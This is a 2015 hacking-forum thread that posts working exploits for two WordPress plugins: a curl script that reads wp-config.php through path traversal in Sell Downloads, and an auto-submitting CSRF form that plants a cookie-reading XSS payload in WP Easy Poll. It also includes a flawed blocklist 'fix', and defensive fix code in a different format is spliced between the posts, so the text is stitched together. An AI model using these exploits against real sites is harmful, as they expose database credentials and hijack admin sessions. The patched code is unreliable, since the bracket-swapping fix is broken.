
WordPress vulnerabilities 2015

Thread in the section "Vulnerabilities of popular CMS", started by user Хулиган, 12 Dec 2015.

  1. Хулиган
    Хулиган Forum staff Advanced
    Allows data to be read from the config file; an exploit for checking/exploiting the vulnerability:

    Wordpress plugin sell download v1.0.16 - local file disclosure.
    Code:
    ###########################################
    #-----------------------------------------#
    #[ 0-DAY Aint DIE | No Priv8 | KedAns-Dz ]#
    #-----------------------------------------#
    # *----------------------------* #
    # K |....##...##..####...####....| . #
    # h |....#...#........#..#...#...| A #
    # a |....#..#.........#..#....#..| N #
    # l |....###........##...#.....#.| S #
    # E |....#.#..........#..#....#..| e #
    # D |....#..#.........#..#...#...| u #
    # . |....##..##...####...####....| r #
    # *----------------------------* #
    #-----------------------------------------#
    #[ Copyright (c) 2015 | Dz Offenders Cr3w]#
    #-----------------------------------------#
    ###########################################
    # >> D_x . Made In Algeria . x_Z << #
    ###########################################
    #
    # [>] Title : Wordpress Plugin Sell Download v1.0.16 Local File Disclosure Vulnerability
    #
    # [>] Author : KedAns-Dz
    # [+] E-mail : ked-h (@hotmail.com)
    # [+] FaCeb0ok : fb.me/K3d.Dz
    # [+] TwiTter : @kedans
    #
    # [#] Platform : PHP / WebApp
    # [+] Cat/Tag : File Disclosure
    #
    # [<] <3 <3 Greetings t0 Palestine <3 <3
    # [!] Vendor : http://wordpress.dwbooster.com/content-tools/sell-downloads
    #
    ###########################################
    #
    # [!] Description :
    #
    # Wordpress plugin Sell Download v1.0.16 is suffer from Local File Disclosure Vulnerability
    # remote attacker can disclosure some local files.
    #
    ####
    
    <?php
    // page : sell-downloads.php
    // lines : 119, 130.. 131
    
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, "http://[target].com/wp-content/plugins/sell-downloads/sell-downloads.php?file=../../../../../../../../.././wp-config.php%00");
    curl_setopt($ch, CURLOPT_HTTPGET, 1);
    curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
    $buf = curl_exec ($ch);
    curl_close($ch);
    unset($ch);
    echo $buf;
    ?>
    
    ####
    # <! THE END ^_* ! , Good Luck all <3 | 0-DAY Aint DIE ^_^ !>
    # Hassi Messaoud (30500) , 1850 city/hood si' elHaouass .<3
    #---------------------------------------------------------------
    # Greetings to my Homies : Meztol-Dz , Caddy-Dz , Kalashinkov3 ,
    # Chevr0sky , Mennouchi.Islem , KinG Of PiraTeS , TrOoN , T0xic,
    # & Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz , Barbaros-DZ , &
    # & KnocKout , Angel Injection , The Black Divels , kaMtiEz , &
    # & Evil-Dz , Elite_Trojan , MalikPc , Marvel-Dz , Shinobi-Dz, &
    # & Keystr0ke , JF , r0073r , CroSs , Inj3ct0r/Milw0rm 1337day &
    # PacketStormSecurity * Metasploit * OWASP * OSVDB * CVE Mitre ;
    ####
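As an added defender-side example (not the Sell Downloads plugin's own code), this is how a `?file=` download handler can be written so that the traversal-plus-null-byte request in the advisory above is rejected: the requested name is refused if it contains a NUL byte, reduced to a bare basename, checked against an extension allow-list, canonicalised with `realpath()` and required to stay under the download directory. The directory, the extension list and the function names are assumptions; the probe strings at the bottom are constructed from the advisory's own URL.

```php
<?php
// Added example, not code from the Sell Downloads plugin. Assumes downloads live in a
// single fixed directory and that a valid request is a bare file name inside it.

function safe_download_path(string $download_dir, string $requested): ?string
{
    // Reject embedded NUL bytes first: on old PHP builds file functions truncated the
    // path at the first NUL, which is exactly what the "%00" suffix in the PoC relies on.
    // (On PHP 8 basename()/realpath() would throw a ValueError on such input anyway.)
    if (strpos($requested, "\0") !== false) {
        return null;
    }

    // Only a bare file name is acceptable: no directory separators, no "." or "..".
    $name = basename($requested);
    if ($name !== $requested || $name === '' || $name === '.' || $name === '..') {
        return null;
    }

    // Allow-list of extensions the store actually sells (assumed list).
    $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    if (!in_array($ext, ['zip', 'pdf', 'mp3'], true)) {
        return null;
    }

    // Canonicalise both sides and require the result to remain under the base directory.
    $base = realpath($download_dir);
    $full = realpath($download_dir . DIRECTORY_SEPARATOR . $name);
    if ($base === false || $full === false || !is_file($full)) {
        return null;
    }
    if (strncmp($full, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $full;
}

function serve_download(string $download_dir, string $requested): void
{
    $path = safe_download_path($download_dir, $requested);
    if ($path === null) {
        http_response_code(400);
        exit('Invalid file request');
    }
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename="' . basename($path) . '"');
    header('Content-Length: ' . (string) filesize($path));
    readfile($path);
    exit;
}

// Constructed self-check: one legitimate name and the traversal strings from the advisory.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'sell-downloads-demo';
if (!is_dir($dir)) {
    mkdir($dir);
}
file_put_contents($dir . DIRECTORY_SEPARATOR . 'ebook.pdf', 'demo');

$probes = [
    'ebook.pdf',
    '../wp-config.php',
    "../../../../../../../../.././wp-config.php\0",
    'ebook.pdf/../../wp-config.php',
];
foreach ($probes as $p) {
    printf("%-48s => %s\n", addcslashes($p, "\0"), safe_download_path($dir, $p) ?? 'rejected');
}
```

The `realpath()` prefix check is what actually closes the hole; the basename and extension checks are defence in depth that also give a clean 400 for malformed input. NUL-byte truncation of paths only works on PHP older than 5.3.4, which rejects paths containing NUL, so the `%00` in the PoC is a compatibility trick for outdated hosts rather than a requirement of the bug.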

    Wordpress plugin wp easy poll 1.1.3 - xss and csrf
    Code:
    Exploit Title: WP Easy Poll 1.1.3 XSS and CSRF
    Exploit Author : Ahn Sung Jun
    Date : 2015-12-09
    Vendor Homepage : https://wordpress.org/plugins/wp-easy-poll-afo/
    Software Link : https://downloads.wordpress.org/plugin/wp-easy-poll-afo.1.1.3.zip
    Version : 1.1.3
    Tested On : Kali Linux Iceweasel
    
    ===========================================
    Vulnerable Code : wp_easy_poll.php
    if(isset($_REQUEST['action']) and $_REQUEST['action'] == 'p_add'){
        global $wpdb;
        $pc = new poll_class;

        /* Line 859 */
        $insert = array('p_ques' => $_REQUEST['p_ques'], 'p_author' => $_REQUEST['p_author'], 'p_start' => $_REQUEST['p_start'], 'p_end' => $_REQUEST['p_end'], 'p_added' => date("Y-m-d H:i:s"), 'p_status' => $_REQUEST['p_status']);

        $wpdb->insert( $wpdb->prefix.$pc->table, $insert );
        $new_poll_id = $wpdb->insert_id;

        $p_anss = $_REQUEST['p_anss'];
        if(is_array($p_anss) and $new_poll_id){
            foreach($p_anss as $key => $value){
                if($value != ''){
                    $insert1 = array('p_id' => $new_poll_id, 'a_ans' => $value, 'a_order' => $key+1);
                    $wpdb->insert( $wpdb->prefix.$pc->table2, $insert1 );
                }
            }
        }
    
    ===========================================
    POC (XSS & CSRF)
    <html>
    <body onload="javascript:document.forms[0].submit()">
    <form name="f" action="http://192.168.0.8/wordpress/wp-admin/admin.php?page=easy_polls&action=add" method="post">
    <input type="hidden" name="action" value="p_add" />
    <input type="hidden" name="p_ques" value="<script>alert(document.cookie)</script>">
    <input type="hidden" name="p_start" id="p_start" value="2015-11-18 22:55:52" required="required" />
    <input type="hidden" name="p_end" id="p_end" value="2015-11-20 09:00:00" required="required"/>
    <input type="submit" name="submit" value="Submit" class="button" />
    </form>
    </html>
    
    ===========================================
    Secure Coding
    if(isset($_REQUEST['action']) and $_REQUEST['action'] == 'p_add'){
        global $wpdb;
        $pc = new poll_class;

        /* Secure Coding */
        // Blocklist approach: rename the literal word "script", then rewrite angle brackets.
        $_REQUEST['p_ques'] = str_replace("script", "x-script", $_REQUEST['p_ques']);
        // Note: the second call also rewrites the '>' characters the first one just produced,
        // so after both calls every '<' and '>' in the question has become '<'.
        $_REQUEST['p_ques'] = str_replace("<", ">", $_REQUEST['p_ques']);
        $_REQUEST['p_ques'] = str_replace(">", "<", $_REQUEST['p_ques']);

        $insert = array('p_ques' => $_REQUEST['p_ques'], 'p_author' => $_REQUEST['p_author'], 'p_start' => $_REQUEST['p_start'], 'p_end' => $_REQUEST['p_end'], 'p_added' => date("Y-m-d H:i:s"), 'p_status' => $_REQUEST['p_status']);

        $wpdb->insert( $wpdb->prefix.$pc->table, $insert );
        $new_poll_id = $wpdb->insert_id;

        $p_anss = $_REQUEST['p_anss'];
        if(is_array($p_anss) and $new_poll_id){
            foreach($p_anss as $key => $value){
                if($value != ''){
                    $insert1 = array('p_id' => $new_poll_id, 'a_ans' => $value, 'a_order' => $key+1);
                    $wpdb->insert( $wpdb->prefix.$pc->table2, $insert1 );
                }
            }
        }
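The "Secure Coding" patch above addresses only the stored-XSS half of the report, and does so by rewriting characters in the request. As an added example (not the WP Easy Poll plugin's own code), the following shows the WordPress-idiomatic fix for both findings: a nonce on the form and `check_admin_referer()` in the handler defeat the auto-submitting PoC page (CSRF), a capability check limits who may add polls, `sanitize_text_field()` cleans input on the way in, and `esc_html()` escapes on the way out regardless of what is stored. It assumes it runs inside WordPress; the table names, the `wpep_add_poll` nonce action, the function names and the `manage_options` capability are assumptions.

```php
<?php
// Added example, not code from the WP Easy Poll plugin. check_admin_referer, wp_nonce_field,
// current_user_can, sanitize_text_field, wp_unslash, esc_html and $wpdb are WordPress core;
// table names and the nonce action name are hypothetical.

// 1. Form side: the nonce is bound to this action and to the logged-in user, so a form
//    served from another origin (the PoC page) cannot carry a valid token.
function wpep_render_add_poll_form(): void
{
    echo '<form method="post" action="' . esc_url(admin_url('admin.php?page=easy_polls&action=add')) . '">';
    wp_nonce_field('wpep_add_poll');   // emits the hidden _wpnonce field
    echo '<input type="hidden" name="action" value="p_add" />';
    echo '<input type="text" name="p_ques" />';
    echo '<input type="text" name="p_start" />';
    echo '<input type="text" name="p_end" />';
    echo '<input type="submit" value="Submit" />';
    echo '</form>';
}

// 2. Handler side: CSRF check, capability check, input sanitisation. $_POST rather than
//    $_REQUEST, so a plain GET link can never reach the insert.
function wpep_handle_add_poll(): void
{
    global $wpdb;
    if (!isset($_POST['action']) || $_POST['action'] !== 'p_add') {
        return;
    }
    // Dies with HTTP 403 if the nonce is missing, expired or issued for another user/site.
    check_admin_referer('wpep_add_poll');
    if (!current_user_can('manage_options')) {
        wp_die(esc_html__('Insufficient permissions', 'wp-easy-poll'), '', ['response' => 403]);
    }

    // Strip tags and control characters from free text; WordPress adds slashes to
    // superglobals, so unslash before sanitising.
    $question = sanitize_text_field(wp_unslash($_POST['p_ques'] ?? ''));
    $start    = sanitize_text_field(wp_unslash($_POST['p_start'] ?? ''));
    $end      = sanitize_text_field(wp_unslash($_POST['p_end'] ?? ''));
    // Dates must match the format the plugin stores; anything else is refused.
    foreach ([$start, $end] as $d) {
        if (!DateTime::createFromFormat('Y-m-d H:i:s', $d)) {
            wp_die(esc_html__('Invalid date', 'wp-easy-poll'), '', ['response' => 400]);
        }
    }

    // Author and status are decided server-side instead of being taken from the request.
    $wpdb->insert($wpdb->prefix . 'easy_polls', [
        'p_ques'   => $question,
        'p_author' => get_current_user_id(),
        'p_start'  => $start,
        'p_end'    => $end,
        'p_added'  => current_time('mysql'),
        'p_status' => 0,
    ], ['%s', '%d', '%s', '%s', '%s', '%d']);
    $poll_id = (int) $wpdb->insert_id;

    $answers = (isset($_POST['p_anss']) && is_array($_POST['p_anss'])) ? $_POST['p_anss'] : [];
    foreach (array_values($answers) as $i => $answer) {
        $answer = sanitize_text_field(wp_unslash($answer));
        if ($answer !== '') {
            $wpdb->insert($wpdb->prefix . 'easy_polls_answers', [
                'p_id'    => $poll_id,
                'a_ans'   => $answer,
                'a_order' => $i + 1,
            ], ['%d', '%s', '%d']);
        }
    }
}

// 3. Output side: escape at render time, so even a question stored before the fix
//    (for example the <script> payload from the PoC) is shown as text, not executed.
function wpep_render_question(string $stored_question): string
{
    return '<h2>' . esc_html($stored_question) . '</h2>';
}

add_action('admin_init', 'wpep_handle_add_poll');
```

Escaping on output is the part that makes the stored-XSS fix robust: the poll question then survives round trips unchanged (a legitimate "3 < 5?" stays readable, unlike with the bracket-swapping patch), and any record written before the patch is rendered safely too. The nonce is what closes the CSRF finding; sanitising input alone does not stop a victim's browser from submitting the form on an attacker's behalf.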
     
    Last edited by a moderator: 12 Dec 2015
    12 Dec 2015
